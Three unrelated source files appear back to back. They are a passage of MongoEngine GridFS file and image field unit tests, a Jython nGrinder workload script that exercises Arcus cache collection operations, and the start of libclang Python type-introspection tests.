            doc_e.the_file.replace(f, filename='doc_e')
            doc_e.save()

            doc_f = GridDocument.objects.with_id(doc_e.id)
            self.assertEqual(doc_e.the_file.grid_id, doc_f.the_file.grid_id)

        # Only the two replaced files should exist in GridFS.
        db = GridDocument._get_db()
        grid_fs = gridfs.GridFS(db)
        self.assertEqual(['doc_b', 'doc_e'], grid_fs.list())

    def test_file_uniqueness(self):
        """Ensure that each instance of a FileField is unique
        """
        class TestFile(Document):
            name = StringField()
            the_file = FileField()

        # First instance
        test_file = TestFile()
        test_file.name = "Hello, World!"
        test_file.the_file.put(six.b('Hello, World!'))
        test_file.save()

        # Second instance
        test_file_dupe = TestFile()
        data = test_file_dupe.the_file.read()  # Should be None

        self.assertTrue(test_file.name != test_file_dupe.name)
        self.assertTrue(test_file.the_file.read() != data)

        TestFile.drop_collection()

    def test_file_saving(self):
        """Ensure you can add meta data to file"""
        class Animal(Document):
            genus = StringField()
            family = StringField()
            photo = FileField()

        Animal.drop_collection()
        marmot = Animal(genus='Marmota', family='Sciuridae')

        marmot_photo = open(TEST_IMAGE_PATH, 'rb')  # Retrieve a photo from disk
        # Extra keyword arguments to put() (here: foo) are stored as GridFS
        # metadata and exposed back as attributes on the proxy.
        marmot.photo.put(marmot_photo, content_type='image/jpeg', foo='bar')
        marmot.photo.close()
        marmot.save()

        marmot = Animal.objects.get()
        self.assertEqual(marmot.photo.content_type, 'image/jpeg')
        self.assertEqual(marmot.photo.foo, 'bar')

    def test_file_reassigning(self):
        """Ensure an existing file can be replaced by assigning a new
        file object to the field."""
        class TestFile(Document):
            the_file = FileField()

        TestFile.drop_collection()

        test_file = TestFile(the_file=open(TEST_IMAGE_PATH, 'rb')).save()
        # 8313 is the on-disk byte size of TEST_IMAGE_PATH.
        self.assertEqual(test_file.the_file.get().length, 8313)

        test_file = TestFile.objects.first()
        test_file.the_file = open(TEST_IMAGE2_PATH, 'rb')
        test_file.save()
        # 4971 is the on-disk byte size of TEST_IMAGE2_PATH.
        self.assertEqual(test_file.the_file.get().length, 4971)

    def test_file_boolean(self):
        """Ensure that a boolean test of a FileField indicates its presence
        """
        class TestFile(Document):
            the_file = FileField()
        TestFile.drop_collection()

        test_file = TestFile()
        self.assertFalse(bool(test_file.the_file))
        test_file.the_file.put(six.b('Hello, World!'),
                               content_type='text/plain')
        test_file.save()
        self.assertTrue(bool(test_file.the_file))

        test_file = TestFile.objects.first()
        self.assertEqual(test_file.the_file.content_type, "text/plain")

    def test_file_cmp(self):
        """Test comparing against other types"""
        class TestFile(Document):
            the_file = FileField()

        test_file = TestFile()
        # An empty proxy must not compare equal to arbitrary objects.
        self.assertFalse(test_file.the_file in [{"test": 1}])

    def test_file_disk_space(self):
        """ Test disk space usage when we delete/replace a file """
        class TestFile(Document):
            the_file = FileField()

        text = six.b('Hello, World!')
        content_type = 'text/plain'

        testfile = TestFile()
        testfile.the_file.put(text, content_type=content_type, filename="hello")
        testfile.save()

        # Now check fs.files and fs.chunks
        db = TestFile._get_db()

        files = db.fs.files.find()
        chunks = db.fs.chunks.find()
        # NOTE(review): assertEquals is the deprecated alias of assertEqual
        # (used throughout this method only).
        self.assertEquals(len(list(files)), 1)
        self.assertEquals(len(list(chunks)), 1)

        # Deleting the document should delete the files
        testfile.delete()

        files = db.fs.files.find()
        chunks = db.fs.chunks.find()
        self.assertEquals(len(list(files)), 0)
        self.assertEquals(len(list(chunks)), 0)

        # Test case where we don't store a file in the first place
        testfile = TestFile()
        testfile.save()

        files = db.fs.files.find()
        chunks = db.fs.chunks.find()
        self.assertEquals(len(list(files)), 0)
        self.assertEquals(len(list(chunks)), 0)

        testfile.delete()

        files = db.fs.files.find()
        chunks = db.fs.chunks.find()
        self.assertEquals(len(list(files)), 0)
        self.assertEquals(len(list(chunks)), 0)

        # Test case where we overwrite the file
        testfile = TestFile()
        testfile.the_file.put(text, content_type=content_type, filename="hello")
        testfile.save()

        text = six.b('Bonjour, World!')
        testfile.the_file.replace(text, content_type=content_type, filename="hello")
        testfile.save()

        # replace() must not leave the old file/chunks behind.
        files = db.fs.files.find()
        chunks = db.fs.chunks.find()
        self.assertEquals(len(list(files)), 1)
        self.assertEquals(len(list(chunks)), 1)

        testfile.delete()

        files = db.fs.files.find()
        chunks = db.fs.chunks.find()
        self.assertEquals(len(list(files)), 0)
        self.assertEquals(len(list(chunks)), 0)

    def test_image_field(self):
        """Ensure ImageField rejects non-image data and round-trips a PNG."""
        if not HAS_PIL:
            raise SkipTest('PIL not installed')

        class TestImage(Document):
            image = ImageField()

        TestImage.drop_collection()

        with tempfile.TemporaryFile() as f:
            f.write(six.b("Hello World!"))
            f.flush()

            t = TestImage()
            try:
                # Plain text is not a decodable image: validation must fail.
                t.image.put(f)
                self.fail("Should have raised an invalidation error")
            except ValidationError as e:
                self.assertEqual("%s" % e, "Invalid image: cannot identify image file %s" % f)

        t = TestImage()
        t.image.put(open(TEST_IMAGE_PATH, 'rb'))
        t.save()

        t = TestImage.objects.first()

        self.assertEqual(t.image.format, 'PNG')

        w, h = t.image.size
        self.assertEqual(w, 371)
        self.assertEqual(h, 76)

        t.image.delete()

    def test_image_field_reassigning(self):
        """Ensure an ImageField can be replaced by assigning a new image."""
        if not HAS_PIL:
            raise SkipTest('PIL not installed')

        class TestFile(Document):
            the_file = ImageField()
        TestFile.drop_collection()

        test_file = TestFile(the_file=open(TEST_IMAGE_PATH, 'rb')).save()
        self.assertEqual(test_file.the_file.size, (371, 76))

        test_file = TestFile.objects.first()
        test_file.the_file = open(TEST_IMAGE2_PATH, 'rb')
        test_file.save()
        self.assertEqual(test_file.the_file.size, (45, 101))

    def test_image_field_resize(self):
        """Ensure size=(w, h) scales the stored image down to fit."""
        if not HAS_PIL:
            raise SkipTest('PIL not installed')

        class TestImage(Document):
            image = ImageField(size=(185, 37))
        TestImage.drop_collection()

        t = TestImage()
        t.image.put(open(TEST_IMAGE_PATH, 'rb'))
        t.save()

        t = TestImage.objects.first()

        self.assertEqual(t.image.format, 'PNG')
        w, h = t.image.size

        self.assertEqual(w, 185)
        self.assertEqual(h, 37)

        t.image.delete()

    def test_image_field_resize_force(self):
        """Ensure size=(w, h, True) forces the exact target dimensions."""
        if not HAS_PIL:
            raise SkipTest('PIL not installed')

        class TestImage(Document):
            image = ImageField(size=(185, 37, True))
        TestImage.drop_collection()

        t = TestImage()
        t.image.put(open(TEST_IMAGE_PATH, 'rb'))
        t.save()

        t = TestImage.objects.first()

        self.assertEqual(t.image.format, 'PNG')
        w, h = t.image.size

        self.assertEqual(w, 185)
        self.assertEqual(h, 37)

        t.image.delete()

    def test_image_field_thumbnail(self):
        """Ensure thumbnail_size stores a thumbnail alongside the image."""
        if not HAS_PIL:
            raise SkipTest('PIL not installed')

        class TestImage(Document):
            image = ImageField(thumbnail_size=(92, 18))
        TestImage.drop_collection()

        t = TestImage()
        t.image.put(open(TEST_IMAGE_PATH, 'rb'))
        t.save()

        t = TestImage.objects.first()

        self.assertEqual(t.image.thumbnail.format, 'PNG')
        self.assertEqual(t.image.thumbnail.width, 92)
        self.assertEqual(t.image.thumbnail.height, 18)

        t.image.delete()

    def test_file_multidb(self):
        """Ensure FileField honours db_alias and a custom collection_name."""
        register_connection('test_files', 'test_files')

        class TestFile(Document):
            name = StringField()
            the_file = FileField(db_alias="test_files",
                                 collection_name="macumba")

        TestFile.drop_collection()

        # delete old filesystem
        get_db("test_files").macumba.files.drop()
        get_db("test_files").macumba.chunks.drop()

        # First instance
        test_file = TestFile()
        test_file.name = "Hello, World!"
        test_file.the_file.put(six.b('Hello, World!'),
                               name="hello.txt")
        test_file.save()

        # The file must land in the aliased db's "macumba" collection.
        data = get_db("test_files").macumba.files.find_one()
        self.assertEqual(data.get('name'), 'hello.txt')

        test_file = TestFile.objects.first()
        self.assertEqual(test_file.the_file.read(), six.b('Hello, World!'))

        test_file = TestFile.objects.first()
        test_file.the_file = six.b('HELLO, WORLD!')
        test_file.save()

        test_file = TestFile.objects.first()
        self.assertEqual(test_file.the_file.read(), six.b('HELLO, WORLD!'))

    def test_copyable(self):
        """Ensure documents holding a GridFS proxy survive copy/deepcopy."""
        class PutFile(Document):
            the_file = FileField()

        PutFile.drop_collection()

        text = six.b('Hello, World!')
        content_type = 'text/plain'

        putfile = PutFile()
        putfile.the_file.put(text, content_type=content_type)
        putfile.save()

        # A second registered Document class must not interfere with copying.
        class TestFile(Document):
            name = StringField()

        self.assertEqual(putfile, copy.copy(putfile))
        self.assertEqual(putfile, copy.deepcopy(putfile))

    def test_get_image_by_grid_id(self):
        """Ensure an image document can be queried by its grid_id."""
        if not HAS_PIL:
            raise SkipTest('PIL not installed')

        class TestImage(Document):

            image1 = ImageField()
            image2 = ImageField()

        TestImage.drop_collection()

        t = TestImage()
        t.image1.put(open(TEST_IMAGE_PATH, 'rb'))
        t.image2.put(open(TEST_IMAGE2_PATH, 'rb'))
        t.save()

        test = TestImage.objects.first()
        grid_id = test.image1.grid_id

        # NOTE(review): Python `or` on Q objects short-circuits to the first
        # (truthy) Q, so this only queries image1. A real union would be
        # Q(image1=grid_id) | Q(image2=grid_id) - confirm intent.
        self.assertEqual(1, TestImage.objects(Q(image1=grid_id)
                                              or Q(image2=grid_id)).count())

    def test_complex_field_filefield(self):
        """Ensure you can add meta data to file"""
        class Animal(Document):
            genus = StringField()
            family = StringField()
            photos = ListField(FileField())

        Animal.drop_collection()
        marmot = Animal(genus='Marmota', family='Sciuridae')

        marmot_photo = open(TEST_IMAGE_PATH, 'rb')  # Retrieve a photo from disk

        # Build a standalone GridFS proxy for one ListField(FileField) slot.
        photos_field = marmot._fields['photos'].field
        new_proxy = photos_field.get_proxy_obj('photos', marmot)
        new_proxy.put(marmot_photo, content_type='image/jpeg', foo='bar')
        marmot_photo.close()
        marmot.photos.append(new_proxy)
        marmot.save()

        marmot = Animal.objects.get()
        self.assertEqual(marmot.photos[0].content_type, 'image/jpeg')
        self.assertEqual(marmot.photos[0].foo, 'bar')
        self.assertEqual(marmot.photos[0].get().length, 8313)


if __name__ == '__main__':
    unittest.main()
# -*- coding: utf-8 -*-
"""
/*
 * Copyright 2012-2014 NAVER Corp.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
"""
################################################
# Arcus workload simulation script for nGrinder #
################################################
# NOTE(review): this is a Jython 2.x script (print statements,
# `except E, e` syntax, java.* imports) - it runs inside nGrinder, not CPython.

from net.grinder.script import Test
from net.grinder.script.Grinder import grinder
from net.grinder.plugin.http import HTTPRequest, HTTPPluginControl
from net.spy.memcached import ArcusClient, ConnectionFactoryBuilder, FailureMode, AddrUtil
from net.spy.memcached.ops import OperationException
# NOTE(review): CollectionAttributes is imported twice below - harmless but redundant.
from net.spy.memcached.collection import CollectionAttributes, CollectionOverflowAction, Element, ElementValueType, CollectionAttributes, ElementFlagFilter, ElementFlagUpdate
from org.apache.log4j import Logger, Level;
from java.math import BigInteger
from java.lang import Long, Thread, Object, String, System
from java.util import ArrayList, HashMap, Random
from java.util.concurrent import TimeUnit, TimeoutException, ExecutionException, Future
import sys, random, string, time

######################################################
# GLOBAL SETTINGS
######################################################
# configurations for Arcus cloud
arcus_cloud = "127.0.0.1:2181"          # ZooKeeper ensemble address
service_codes = ["test"]
service_code = random.choice(service_codes)  # each worker picks one code at import time

USE_GLOBAL_CLIENT = False # False=per thread , True=process
DEFAULT_CONNECTION_WAIT = 2 # init waiting (seconds)
DEFAULT_TIMEOUT = 3000 # Operation default TO (milliseconds)
DEFAULT_PREFIX = 'arcustest-'  # prepended to every generated key

# create a global client
if USE_GLOBAL_CLIENT:
    global_cfb = ConnectionFactoryBuilder()
    global_client = ArcusClient.createArcusClient(arcus_cloud, service_code, global_cfb)
    # wait for the client to be connected to Arcus cloud
    print 'Wait for global client to be connected to Arcus cloud (%d seconds)' % (DEFAULT_CONNECTION_WAIT)
    Thread.currentThread().sleep(DEFAULT_CONNECTION_WAIT * 1000)

######################################################
# WORKLOAD FUNCTIONS
######################################################
print 'creating workloads'
KeyLen = 20        # random suffix length used by gen_key()
ExpireTime = 600 # seconds

# One representative payload size per memcached slab class; a value of
# roughly 2/3 of the chunk size is generated for each.
chunk_sizes = [96, 120, 152, 192, 240, 304, 384, 480, 600, 752, 944, 1184, 1480, 1856, 2320, 2904, 3632, 4544, 5680, 7104, 8880, 11104, 13880, 17352, 21696, 27120, 33904, 42384, 52984, 66232, 82792, 103496, 129376, 161720, 202152, 252696, 315872, 394840, 493552, 1048576]
chunk_values = ["Not_a_slab_class"]  # index 0 is a sentinel, real values start at 1
for s in chunk_sizes:
    # string.lowercase is Python-2 only (fine under Jython 2.x).
    value = "".join([random.choice(string.lowercase) for i in range(int(s*2/3))])
    chunk_values.append(value)
#chunk_values.append('empty')

# 61 characters (digits + upper + lower missing 'k'); randint(0, 60) below
# covers exactly indices 0..60.
dummystring = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijlmnopqrstuvwxyz"
def generateData(length):
    """ Return a random string of `length` chars drawn from dummystring. """
    ret = ''
    for loop in range(length):
        randomInt = random.randint(0, 60)
        tempchar = dummystring[randomInt]
        ret = ret + tempchar
    return ret

# Payload mix used by the collection test cases (small slab classes only).
workloads = [chunk_values[1], chunk_values[1], chunk_values[2], chunk_values[2], chunk_values[3]]

######################################################
# UTILITY FUNCTIONS
######################################################
def gen_key(name="unknown"):
    """ Generates a key with given name and postfix """
    prefix = DEFAULT_PREFIX
    key = generateData(KeyLen);
    return "%s%s:%s" % (prefix, name, key)

def gen_workload(is_collection):
    """ Generates a string workload with specific size.
    """
    if is_collection:
        # collection elements stay in the smaller slab classes (indices 0..16)
        return random.choice(chunk_values[0:17])
    else:
        return random.choice(chunk_values)

######################################################
# GRINDER TEST RUNNER
######################################################
class TestRunner:
    # One instance is created per Grinder worker thread; __call__ is the
    # per-iteration entry point.

    def __init__(self):
        """ Initialize tests """
        Logger.getLogger("net.spy.memcached").setLevel(Level.DEBUG);

        self.clients = []  # NOTE(review): never used afterwards - confirm it can go

        if USE_GLOBAL_CLIENT:
            # use global client
            self.client = global_client
        else:
            cfb = ConnectionFactoryBuilder()
            self.client = ArcusClient.createArcusClient(arcus_cloud, service_code, cfb)
            print 'Wait for per-thread client to be connected to Arcus cloud (%d seconds)' % DEFAULT_CONNECTION_WAIT
            Thread.currentThread().sleep(DEFAULT_CONNECTION_WAIT * 1000)

        self.flush_counter = 0
        self.tests = []

        # insert operations (each wrapped callable is a Grinder-recorded test)
        self.tests.append(Test(1, "KeyValue").wrap(self.KeyValue))
        self.tests.append(Test(2, "Collection_Btree").wrap(self.Collection_Btree))
        self.tests.append(Test(3, "Collection_Set").wrap(self.Collection_Set))
        self.tests.append(Test(4, "Collection_List").wrap(self.Collection_List))

    def __call__(self):
        """ Tests to run """
        for test in self.tests:
            test(gen_key(test.__name__))

    def arcusGet(self, future, name='unknown', timeout=DEFAULT_TIMEOUT, timeunit=TimeUnit.MILLISECONDS):
        # Resolve an Arcus async future; on any failure, cancel it and
        # return None so callers can just keep issuing operations.
        try:
            return future.get(timeout, timeunit)
        except TimeoutException, e:
            print "TimeoutException(%s) : %s"%(name, str(e))
            future.cancel(1)
        except ExecutionException, e:
            print "ExecutionException(%s) : %s"%(name, str(e))
            try:
                # brief back-off before cancelling
                Thread.sleep(100)
            except Exception, e:
                pass
            future.cancel(1)
        except Exception, e:
            print "Exception : " + str(e)
            future.cancel(1)
        return None

    ######################################################
    # TEST CASES
    ######################################################
    def KeyValue(self, key):
        """ get:set:delete:incr:decr = 3:1:0.01:0.1:0.0001 """
        name = 'KeyValue'
        workloads = [chunk_values[24]]  # shadows the module-level mix on purpose

        # Set
        for i in range(0, 1):
            future = self.client.set(key, ExpireTime, random.choice(workloads))
            result = self.arcusGet(future, name=name)
            #print str(result)

        # Get
        for i in range(0, 5):
            future = self.client.asyncGet(key)
            result = self.arcusGet(future, name=name)

        # Delete
        if random.randint(0, 3) == 0:
            future = self.client.delete(key)
            result = self.arcusGet(future, name=name)

        # Incr
        if random.randint(0, 1) == 0:
            future = self.client.set(key + 'numeric', ExpireTime, '1')
            result = self.arcusGet(future, name=name)
            future = self.client.asyncIncr(key + 'numeric', 1)
            result = self.arcusGet(future, name=name)

        # Decr
        if random.randint(0, 1) == 0:
            future = self.client.set(key + 'numeric', ExpireTime, '1')
            result = self.arcusGet(future, name=name)
            future = self.client.asyncDecr(key + 'numeric', 1)
            result = self.arcusGet(future, name=name)

    def Collection_Btree(self, key):
        """ Exercise b+tree collection ops (insert, bulk, get, smget,
        update, attr, delete) with byte-array bkeys. """
        name = 'Collection_Btree'

        keyList = []
        # NOTE(review): original comment said "Create 5 key" but range(4)
        # creates 4; the GetBulk/SMGet ranges below go up to prefix str(4).
        for i in range(4):
            keyList.append(key + str(i))

        bkeyBASE = "bkey_byteArry"
        eflag = String("EFLAG").getBytes()
        # NOTE(review): `filter` shadows the Python builtin.
        filter = ElementFlagFilter(ElementFlagFilter.CompOperands.Equal, String("EFLAG").getBytes())
        attr = CollectionAttributes()
        attr.setExpireTime(ExpireTime)

        # BopInsert + byte_array bkey
        for j in range(4):
            for i in range(50): # Insert 50 bkey
                bk = bkeyBASE + str(j) + str(i) # Uniq bkey
                bkey = String(String.valueOf(bk)).getBytes() ####____####
                future = self.client.asyncBopInsert(keyList[j], bkey, eflag, random.choice(workloads), attr)
                result = self.arcusGet(future, name=name)
                #print str(result)

        # Bop Bulk Insert (Piped Insert)
        elements = []
        for i in range(50):
            bk = bkeyBASE + str(0) + str(i) + "bulk"
            elements.append(Element(String(str(bk)).getBytes(), workloads[0], eflag))
        ####____####
        future = self.client.asyncBopPipedInsertBulk(keyList[0], elements, CollectionAttributes())
        result = self.arcusGet(future, name=name)
        #print str(result)

        # BopGet Range + filter
        for j in range(4):
            bk = bkeyBASE + str(j) + str(0)
            bk_to = bkeyBASE + str(j) + str(50)
            bkey = String(String.valueOf(bk)).getBytes()
            bkey_to = String(String.valueOf(bk_to)).getBytes() ####____####
            future = self.client.asyncBopGet(keyList[j], bkey, bkey_to, filter, 0, random.randint(20, 50), False, False)
            result = self.arcusGet(future, name=name)
            #print str(result)

        # BopGetBulk // 20120319 Ad
        bk = bkeyBASE + str(0) + str(0)
        bk_to = bkeyBASE + str(4) + str(50)
        bkey = String(String.valueOf(bk)).getBytes()
        bkey_to = String(String.valueOf(bk_to)).getBytes()
        ####____####
        future = self.client.asyncBopGetBulk(keyList, bkey, bkey_to, filter, 0, random.randint(20, 50))
        result = self.arcusGet(future, name=name)
        #for entry in result.entrySet():
        #    print str(entry.getKey())
        #    if entry.getValue().getElements() is not None:
        #        print "["
        #        for element in entry.getValue().getElements().entrySet():
        #            print "bkey=%s, value=%s" % (str(element.getKey()), str(element.getValue().getValue()))
        #        print "]"
        #    else:
        #        print "[elements=%s, response=%s]" % (entry.getValue().getElements(), entry.getValue().getCollectionResponse().getMessage())
        #print ""
        #print str(result)

        # BopEmpty Create
        future = self.client.asyncBopCreate(key, ElementValueType.STRING, CollectionAttributes())
        result = self.arcusGet(future, name=name)
        #print str(result)

        # BopSMGet
        bk = bkeyBASE + str(0) + str(0)
        bk_to = bkeyBASE + str(4) + str(50)
        bkey = String(String.valueOf(bk)).getBytes() ####____####
        bkey_to = String(String.valueOf(bk_to)).getBytes() ####____####
        future = self.client.asyncBopSortMergeGet(keyList, bkey, bkey_to, filter, 0, random.randint(20, 50))
        result = self.arcusGet(future, name=name)
        #print str(result)

        # BopUpdate (eflag bitOP + value)
        key = keyList[0]
        eflagOffset = 0
        value = "ThisIsChangeValue"
        bitop = ElementFlagUpdate(eflagOffset, ElementFlagFilter.BitWiseOperands.AND, String("aflag").getBytes())
        # NOTE(review): original comment said "3 element update" but range(2)
        # updates 2 elements - confirm intent.
        for i in range(2):
            bk = bkeyBASE + str(0) + str(i)
            bkey = String(String.valueOf(bk)).getBytes() ####____####
            future = self.client.asyncBopUpdate(key, bkey, bitop, value)
            result = self.arcusGet(future, name=name)
            #print str(result)

        # SetAttr (change Expire Time)
        attr.setExpireTime(100)
        future = self.client.asyncSetAttr(key, attr)
        result = self.arcusGet(future, name=name)
        #print str(result)

        # BopDelete (eflag filter delete)
        for j in range(4):
            bk = bkeyBASE + str(j) + str(0)
            bk_to = bkeyBASE + str(j) + str(10)
            bkey = String(String.valueOf(bk)).getBytes() ####____####
            bkey_to = String(String.valueOf(bk_to)).getBytes() ####____####
            future = self.client.asyncBopDelete(keyList[j], bkey, bkey_to, filter, 0, False)
            result = self.arcusGet(future, name=name)
            #print str(result)

    def Collection_Set(self, key):
        """ Exercise set collection ops (insert, piped bulk, exist, attr,
        delete). """
        name = 'Collection_Set'
        attr = CollectionAttributes()
        attr.setExpireTime(ExpireTime)

        keyList = []
        for i in range(4):
            keyList.append(key + str(i))

        # SopInsert
        for i in range(4):
            for j in range(19):
                set_value = workloads[i] + str(j)
                future = self.client.asyncSopInsert(keyList[i], set_value, attr)
                result = self.arcusGet(future, name=name)
                #print str(result)

        # SopInsert Bulk (Piped)
        elements = []
        for i in range(50):
            elements.append(str(i) + "_" + workloads[0])
        future = self.client.asyncSopPipedInsertBulk(key, elements, CollectionAttributes())
        result = self.arcusGet(future, name=name)
        #print str(result)

        # SopEmpty Create
        future = self.client.asyncSopCreate(key, ElementValueType.STRING, CollectionAttributes())
        result = self.arcusGet(future, name=name)
        #print str(result)

        # SopExist (Piped exist)
        for i in range(4):
            listValue = []
            # NOTE(review): original comment said "10 value exist" but
            # range(9) checks 9 values - confirm intent.
            for j in range(9):
                listValue.append(workloads[i] + str(j))
            future = self.client.asyncSopPipedExistBulk(keyList[i], listValue)
            result = self.arcusGet(future, name=name)
            #print str(result)

        # SetAttr (change Expire Time)
        attr.setExpireTime(100)
        future = self.client.asyncSetAttr(keyList[0], attr)
        result = self.arcusGet(future, name=name)
        #print str(result)

        # SopDelete
        for i in range(4):
            # NOTE(review): original comment said "5 element value delete"
            # but range(4) deletes 4 - confirm intent.
            for j in range(4):
                delValue = workloads[i] + str(j)
                future = self.client.asyncSopDelete(keyList[i], delValue, True)
                result = self.arcusGet(future, name=name)
                #print str(result)

    def Collection_List(self, key):
        """ Exercise list collection ops (insert, piped bulk, range get,
        attr, delete). """
        name = 'Collection_List'
        attr = CollectionAttributes()
        attr.setExpireTime(ExpireTime)

        keyList = []
        index = -1 # Tail insert
        for i in range(4):
            keyList.append(key + str(i))

        # LopInsert
        for i in range(4):
            for j in range(50):
                future = self.client.asyncLopInsert(keyList[i], index, random.choice(workloads), attr)
                result = self.arcusGet(future, name=name)
                #print str(result)

        # LopInsert Bulk (Piped)
        elements = []
        for i in range(50):
            elements.append(str(i) + "_" + workloads[0])
        future = self.client.asyncLopPipedInsertBulk(keyList[0], -1, elements, CollectionAttributes())
        result = self.arcusGet(future, name=name)
        #print str(result)

        # LopGet
        for i in range(4):
            index = 0
            index_to = index + random.randint(20, 50)
            future = self.client.asyncLopGet(keyList[i], index, index_to, False, False)
            result = self.arcusGet(future, name=name)
            #print str(result)

        # LopAttr
        attr.setExpireTime(100)
        future = self.client.asyncSetAttr(keyList[0], attr)
        result = self.arcusGet(future, name=name)
        #print str(result)

        # LopDelete
        index = 0
        index_to = 19
        # NOTE(review): range(1) only deletes from keyList[0] - confirm intent.
        for i in range(1):
            future = self.client.asyncLopDelete(keyList[i], index, index_to, True)
            result = self.arcusGet(future, name=name)
            #print str(result)
# Tests for clang.cindex Type: field introspection, qualifiers, arrays,
# function types, and record layout. Runs under nose against libclang.
import gc

from clang.cindex import CursorKind
from clang.cindex import TranslationUnit
from clang.cindex import TypeKind
from nose.tools import raises

from .util import get_cursor
from .util import get_tu

# C input shared by the struct-field tests below.
kInput = """\

typedef int I;

struct teststruct {
  int a;
  I b;
  long c;
  unsigned long d;
  signed long e;
  const int f;
  int *g;
  int ***h;
};

"""

def test_a_struct():
    """Check Cursor/Type introspection over every field of a struct."""
    tu = get_tu(kInput)

    teststruct = get_cursor(tu, 'teststruct')
    assert teststruct is not None, "Could not find teststruct."
    fields = list(teststruct.get_children())

    assert all(x.kind == CursorKind.FIELD_DECL for x in fields)
    assert all(x.translation_unit is not None for x in fields)

    assert fields[0].spelling == 'a'
    assert not fields[0].type.is_const_qualified()
    assert fields[0].type.kind == TypeKind.INT
    assert fields[0].type.get_canonical().kind == TypeKind.INT

    # typedef'd field: TYPEDEF kind, canonical resolves to INT.
    assert fields[1].spelling == 'b'
    assert not fields[1].type.is_const_qualified()
    assert fields[1].type.kind == TypeKind.TYPEDEF
    assert fields[1].type.get_canonical().kind == TypeKind.INT
    assert fields[1].type.get_declaration().spelling == 'I'

    assert fields[2].spelling == 'c'
    assert not fields[2].type.is_const_qualified()
    assert fields[2].type.kind == TypeKind.LONG
    assert fields[2].type.get_canonical().kind == TypeKind.LONG

    assert fields[3].spelling == 'd'
    assert not fields[3].type.is_const_qualified()
    assert fields[3].type.kind == TypeKind.ULONG
    assert fields[3].type.get_canonical().kind == TypeKind.ULONG

    # "signed long" is the same TypeKind as "long".
    assert fields[4].spelling == 'e'
    assert not fields[4].type.is_const_qualified()
    assert fields[4].type.kind == TypeKind.LONG
    assert fields[4].type.get_canonical().kind == TypeKind.LONG

    assert fields[5].spelling == 'f'
    assert fields[5].type.is_const_qualified()
    assert fields[5].type.kind == TypeKind.INT
    assert fields[5].type.get_canonical().kind == TypeKind.INT

    assert fields[6].spelling == 'g'
    assert not fields[6].type.is_const_qualified()
    assert fields[6].type.kind == TypeKind.POINTER
    assert fields[6].type.get_pointee().kind == TypeKind.INT

    # Triple pointer: three POINTER hops down to INT.
    assert fields[7].spelling == 'h'
    assert not fields[7].type.is_const_qualified()
    assert fields[7].type.kind == TypeKind.POINTER
    assert fields[7].type.get_pointee().kind == TypeKind.POINTER
    assert fields[7].type.get_pointee().get_pointee().kind == TypeKind.POINTER
    assert fields[7].type.get_pointee().get_pointee().get_pointee().kind == TypeKind.INT

def test_references():
    """Ensure that a Type maintains a reference to a TranslationUnit."""
    tu = get_tu('int x;')
    children = list(tu.cursor.get_children())
    assert len(children) > 0

    cursor = children[0]
    t = cursor.type

    assert isinstance(t.translation_unit, TranslationUnit)

    # Delete main TranslationUnit reference and force a GC.
    del tu
    gc.collect()
    assert isinstance(t.translation_unit, TranslationUnit)

    # If the TU was destroyed, this should cause a segfault.
    decl = t.get_declaration()

constarrayInput="""
struct teststruct {
  void *A[2];
};
"""
def testConstantArray():
    """Check CONSTANTARRAY element type and array size introspection."""
    tu = get_tu(constarrayInput)

    teststruct = get_cursor(tu, 'teststruct')
    assert teststruct is not None, "Didn't find teststruct??"
    fields = list(teststruct.get_children())
    assert fields[0].spelling == 'A'
    assert fields[0].type.kind == TypeKind.CONSTANTARRAY
    assert fields[0].type.get_array_element_type() is not None
    assert fields[0].type.get_array_element_type().kind == TypeKind.POINTER
    assert fields[0].type.get_array_size() == 2

def test_equal():
    """Ensure equivalence operators work on Type."""
    source = 'int a; int b; void *v;'
    tu = get_tu(source)

    a = get_cursor(tu, 'a')
    b = get_cursor(tu, 'b')
    v = get_cursor(tu, 'v')

    assert a is not None
    assert b is not None
    assert v is not None

    assert a.type == b.type
    assert a.type != v.type

    # Deliberate != against None and a str: exercises Type.__ne__ with
    # non-Type operands (do not "fix" to `is not None`).
    assert a.type != None
    assert a.type != 'foo'

def test_type_spelling():
    """Ensure Type.spelling works."""
    tu = get_tu('int c[5]; int i[]; int x; int v[x];')
    c = get_cursor(tu, 'c')
    i = get_cursor(tu, 'i')
    x = get_cursor(tu, 'x')
    v = get_cursor(tu, 'v')
    assert c is not None
    assert i is not None
    assert x is not None
    assert v is not None
    assert c.type.spelling == "int [5]"
    assert i.type.spelling == "int []"
    assert x.type.spelling == "int"
    assert v.type.spelling == "int [x]"

def test_typekind_spelling():
    """Ensure TypeKind.spelling works."""
    tu = get_tu('int a;')
    a = get_cursor(tu, 'a')

    assert a is not None
    assert a.type.kind.spelling == 'Int'

def test_function_argument_types():
    """Ensure that Type.argument_types() works as expected."""
    tu = get_tu('void f(int, int);')
    f = get_cursor(tu, 'f')
    assert f is not None

    args = f.type.argument_types()
    assert args is not None
    assert len(args) == 2

    t0 = args[0]
    assert t0 is not None
    assert t0.kind == TypeKind.INT

    t1 = args[1]
    assert t1 is not None
    assert t1.kind == TypeKind.INT

    # The ArgumentsIterator must also be iterable and yield equal Types.
    args2 = list(args)
    assert len(args2) == 2
    assert t0 == args2[0]
    assert t1 == args2[1]

@raises(TypeError)
def test_argument_types_string_key():
    """Ensure that non-int keys raise a TypeError."""
    tu = get_tu('void f(int, int);')
    f = get_cursor(tu, 'f')
    assert f is not None

    args = f.type.argument_types()
    assert len(args) == 2

    args['foo']

@raises(IndexError)
def test_argument_types_negative_index():
    """Ensure that negative indexes on argument_types Raises an IndexError."""
    tu = get_tu('void f(int, int);')
    f = get_cursor(tu, 'f')
    args = f.type.argument_types()

    args[-1]

@raises(IndexError)
def test_argument_types_overflow_index():
    """Ensure that indexes beyond the length of Type.argument_types() raise."""
    tu = get_tu('void f(int, int);')
    f = get_cursor(tu, 'f')
    args = f.type.argument_types()

    args[2]

@raises(Exception)
def test_argument_types_invalid_type():
    """Ensure that obtaining argument_types on a Type without them raises."""
    tu = get_tu('int i;')
    i = get_cursor(tu, 'i')
    assert i is not None

    i.type.argument_types()

def test_is_pod():
    """Ensure Type.is_pod() works."""
